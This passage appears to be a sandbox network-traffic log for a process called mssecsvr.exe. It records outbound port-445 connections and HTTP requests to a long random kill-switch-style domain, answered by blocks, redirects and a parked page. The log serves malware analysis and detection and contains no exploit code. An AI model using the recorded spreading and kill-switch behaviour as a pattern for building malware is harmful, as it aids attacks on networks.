73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 31 38 36 30 30 39 38 36 34 36 30 33 35 37 33 32 38 37 37 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=2&xinfo=13-436786214-0%200NNN%20RT%281671700092204%200%29%20q%28-1%20-1%20-1%20-1%29%20r%280%20-1%29%20b1&incident_id=0-1860098646035732877&edet=3&cinfo=ffffffff&pe=544&rpinfo=0&mth=NA" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-1860098646035732877</iframe></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            2145.60.37.4445192.168.2.360986C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:08:16.440777063 CET556INHTTP/1.1 400 Bad Request
                                                                                            Content-Type: text/html
                                                                                            Cache-Control: no-cache, no-store
                                                                                            Connection: close
                                                                                            Content-Length: 699
                                                                                            X-Iinfo: 4-155113614-0 0NNN RT(1671700095541 0) q(-1 -1 -1 -1) r(0 -1) b1
                                                                                            Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 32 26 78 69 6e 66 6f 3d 34 2d 31 35 35 31 31 33 36 31 34 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 36 37 31 37 30 30 30 39 35 35 34 31 25 32 30 30 25 32 39 25 32 30 71 25 32 38 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 25 32 30 62 31 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 36 37 39 32 37 31 35 31 39 31 33 36 30 36 31 38 32 38 26 65 64 65 74 3d 33 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 70 65 3d 35 34 34 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 4e 41 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 36 37 39 32 37 31 35 31 39 31 33 36 30 36 31 38 32 38 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=2&xinfo=4-155113614-0%200NNN%20RT%281671700095541%200%29%20q%28-1%20-1%20-1%20-1%29%20r%280%20-1%29%20b1&incident_id=0-679271519136061828&edet=3&cinfo=ffffffff&pe=544&rpinfo=0&mth=NA" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-679271519136061828</iframe></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            2245.60.37.5445192.168.2.360994C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:08:16.993892908 CET561INHTTP/1.1 400 Bad Request
                                                                                            Content-Type: text/html
                                                                                            Cache-Control: no-cache, no-store
                                                                                            Connection: close
                                                                                            Content-Length: 702
                                                                                            X-Iinfo: 12-308959207-0 0NNN RT(1671700096026 0) q(-1 -1 -1 -1) r(0 -1) b1
                                                                                            Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 32 26 78 69 6e 66 6f 3d 31 32 2d 33 30 38 39 35 39 32 30 37 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 36 37 31 37 30 30 30 39 36 30 32 36 25 32 30 30 25 32 39 25 32 30 71 25 32 38 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 25 32 30 62 31 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 31 32 37 34 31 37 32 34 37 37 33 30 31 34 36 33 36 32 38 26 65 64 65 74 3d 33 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 70 65 3d 35 34 34 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 4e 41 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 31 32 37 34 31 37 32 34 37 37 33 30 31 34 36 33 36 32 38 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=2&xinfo=12-308959207-0%200NNN%20RT%281671700096026%200%29%20q%28-1%20-1%20-1%20-1%29%20r%280%20-1%29%20b1&incident_id=0-1274172477301463628&edet=3&cinfo=ffffffff&pe=544&rpinfo=0&mth=NA" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-1274172477301463628</iframe></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            2345.60.37.5445192.168.2.361330C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:08:20.473855019 CET569INHTTP/1.1 400 Bad Request
                                                                                            Content-Type: text/html
                                                                                            Cache-Control: no-cache, no-store
                                                                                            Connection: close
                                                                                            Content-Length: 699
                                                                                            X-Iinfo: 3-110152661-0 0NNN RT(1671700099506 0) q(-1 -1 -1 -1) r(0 -1) b1
                                                                                            Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 32 26 78 69 6e 66 6f 3d 33 2d 31 31 30 31 35 32 36 36 31 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 36 37 31 37 30 30 30 39 39 35 30 36 25 32 30 30 25 32 39 25 32 30 71 25 32 38 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 25 32 30 62 31 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 34 37 31 36 35 38 33 34 34 38 35 30 30 30 34 35 34 37 26 65 64 65 74 3d 33 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 70 65 3d 35 34 34 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 4e 41 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 34 37 31 36 35 38 33 34 34 38 35 30 30 30 34 35 34 37 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=2&xinfo=3-110152661-0%200NNN%20RT%281671700099506%200%29%20q%28-1%20-1%20-1%20-1%29%20r%280%20-1%29%20b1&incident_id=0-471658344850004547&edet=3&cinfo=ffffffff&pe=544&rpinfo=0&mth=NA" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-471658344850004547</iframe></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            2445.60.37.6445192.168.2.361444C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:08:21.445676088 CET574INHTTP/1.1 400 Bad Request
                                                                                            Content-Type: text/html
                                                                                            Cache-Control: no-cache, no-store
                                                                                            Connection: close
                                                                                            Content-Length: 704
                                                                                            X-Iinfo: 14-435149326-0 0NNN RT(1671700100159 386) q(-1 -1 -1 -1) r(0 -1) b1
                                                                                            Data Raw: 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 68 65 61 64 3e 3c 4d 45 54 41 20 4e 41 4d 45 3d 22 52 4f 42 4f 54 53 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 22 3e 3c 69 66 72 61 6d 65 20 69 64 3d 22 6d 61 69 6e 2d 69 66 72 61 6d 65 22 20 73 72 63 3d 22 2f 5f 49 6e 63 61 70 73 75 6c 61 5f 52 65 73 6f 75 72 63 65 3f 43 57 55 44 4e 53 41 49 3d 32 26 78 69 6e 66 6f 3d 31 34 2d 34 33 35 31 34 39 33 32 36 2d 30 25 32 30 30 4e 4e 4e 25 32 30 52 54 25 32 38 31 36 37 31 37 30 30 31 30 30 31 35 39 25 32 30 33 38 36 25 32 39 25 32 30 71 25 32 38 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 30 2d 31 25 32 39 25 32 30 72 25 32 38 30 25 32 30 2d 31 25 32 39 25 32 30 62 31 26 69 6e 63 69 64 65 6e 74 5f 69 64 3d 30 2d 31 38 34 30 37 36 34 32 31 35 30 39 37 36 32 39 30 37 30 26 65 64 65 74 3d 33 26 63 69 6e 66 6f 3d 66 66 66 66 66 66 66 66 26 70 65 3d 35 34 34 26 72 70 69 6e 66 6f 3d 30 26 6d 74 68 3d 4e 41 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 30 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 70 78 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 70 78 22 3e 52 65 71 75 65 73 74 20 75 6e 73 75 63 63 65 73 73 66 75 6c 2e 20 49 6e 63 61 70 73 75 6c 61 20 69 6e 63 69 64 65 6e 74 20 49 44 3a 20 30 2d 31 38 34 30 37 36 34 32 31 35 30 39 37 36 32 39 30 37 30 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=2&xinfo=14-435149326-0%200NNN%20RT%281671700100159%20386%29%20q%28-1%20-1%20-1%20-1%29%20r%280%20-1%29%20b1&incident_id=0-1840764215097629070&edet=3&cinfo=ffffffff&pe=544&rpinfo=0&mth=NA" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 0-1840764215097629070</iframe></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            3192.168.2.349689103.224.212.22080C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:04:13.498811960 CET0OUTGET / HTTP/1.1
                                                                                            Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                                                                                            Cache-Control: no-cache


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            4103.224.212.22080192.168.2.349689C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:04:13.697971106 CET0INHTTP/1.1 302 Found
                                                                                            date: Thu, 22 Dec 2022 09:04:13 GMT
                                                                                            server: Apache/2.4.38 (Debian)
                                                                                            set-cookie: __tad=1671699853.2492624; expires=Sun, 19-Dec-2032 09:04:13 GMT; Max-Age=315360000
                                                                                            location: http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
                                                                                            content-length: 0
                                                                                            content-type: text/html; charset=UTF-8
                                                                                            connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            5192.168.2.34969076.223.26.9680C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:04:13.850075006 CET1OUTGET / HTTP/1.1
                                                                                            Cache-Control: no-cache
                                                                                            Host: ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                                                                                            Connection: Keep-Alive


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            676.223.26.9680192.168.2.349690C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:04:13.987341881 CET2INHTTP/1.1 403 Forbidden
                                                                                            Date: Thu, 22 Dec 2022 09:04:13 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 146
                                                                                            Connection: keep-alive
                                                                                            Server: nginx
                                                                                            Vary: Accept-Encoding
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            7192.168.2.349691103.224.212.22080C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:04:14.951214075 CET2OUTGET / HTTP/1.1
                                                                                            Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                                                                                            Cache-Control: no-cache


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            8103.224.212.22080192.168.2.349691C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:04:15.186532974 CET3INHTTP/1.1 302 Found
                                                                                            date: Thu, 22 Dec 2022 09:04:15 GMT
                                                                                            server: Apache/2.4.38 (Debian)
                                                                                            set-cookie: __tad=1671699855.6725701; expires=Sun, 19-Dec-2032 09:04:15 GMT; Max-Age=315360000
                                                                                            location: http://ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/?subid1=20221222-2004-15a5-aec0-299192b1f656
                                                                                            content-length: 0
                                                                                            content-type: text/html; charset=UTF-8
                                                                                            connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            9192.168.2.349692199.59.243.22280C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Dec 22, 2022 10:04:15.406811953 CET4OUTGET /?subid1=20221222-2004-15a5-aec0-299192b1f656 HTTP/1.1
                                                                                            Cache-Control: no-cache
                                                                                            Host: ww25.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                                                                                            Connection: Keep-Alive
                                                                                            Dec 22, 2022 10:04:15.609205961 CET5INHTTP/1.1 200 OK
                                                                                            Server: openresty
                                                                                            Date: Thu, 22 Dec 2022 09:04:15 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Set-Cookie: parking_session=b14576e1-10cb-6c38-b3eb-bb319fc837ce; expires=Thu, 22-Dec-2022 09:19:15 GMT; Max-Age=900; path=/; HttpOnly
                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zWesNxy5BJS0Bnij4wKZiVM+S1DMDB1pbuEnkMW/4eSY0YEJZcSA10P/bT9Qxof4bQpHzygCU/SY5/nMuO7b7A==
                                                                                            Cache-Control: no-cache
                                                                                            Accept-CH: sec-ch-prefers-color-scheme
                                                                                            Critical-CH: sec-ch-prefers-color-scheme
                                                                                            Vary: sec-ch-prefers-color-scheme
                                                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                            Cache-Control: no-store, must-revalidate
                                                                                            Cache-Control: post-check=0, pre-check=0
                                                                                            Pragma: no-cache
                                                                                            Data Raw: 34 32 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 57 65 73 4e 78 79 35 42 4a 53 30 42 6e 69 6a 34 77 4b 5a 69 56 4d 2b 53 31 44 4d 44 42 31 70 62 75 45 6e 6b 4d 57 2f 34 65 53 59 30 59 45 4a 5a 63 53 41 31 30 50 2f 62 54 39 51 78 6f 66 34 62 51 70 48 7a 79 67 43 55 2f 53 59 35 2f 6e 4d 75 4f 37 62 37 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74
                                                                                            Data Ascii: 427<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zWesNxy5BJS0Bnij4wKZiVM+S1DMDB1pbuEnkMW/4eSY0YEJZcSA10P/bT9Qxof4bQpHzygCU/SY5/nMuO7b7A=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect
                                                                                            Dec 22, 2022 10:04:15.609311104 CET6INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f
                                                                                            Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiYjE0NTc2ZTEtMTBjYi02YzM4LWIzZWItYmIzMTlmYzgzN2NlIiwicGFnZV90aW1lIjoxNjcxNjk5ODU1LCJwYWdlX3VybCI6Imh0dHA6XC9cL
                                                                                            Dec 22, 2022 10:04:15.623811960 CET7INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f
                                                                                            Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiYjE0NTc2ZTEtMTBjYi02YzM4LWIzZWItYmIzMTlmYzgzN2NlIiwicGFnZV90aW1lIjoxNjcxNjk5ODU1LCJwYWdlX3VybCI6Imh0dHA6XC9cL


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            0192.168.2.34971923.211.4.90443C:\Windows\mssecsvr.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            2022-12-22 09:04:17 UTC0OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            Accept-Encoding: identity
                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                            Host: fs.microsoft.com
                                                                                            2022-12-22 09:04:17 UTC0INHTTP/1.1 200 OK
                                                                                            Content-Type: application/octet-stream
                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                            ApiVersion: Distribute 1.1
                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                            X-Azure-Ref: 0JuihYwAAAAAFyVjTsdqZQIeFHkniFd5PTFRTRURHRTEzMjEAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                                                                            Cache-Control: public, max-age=114492
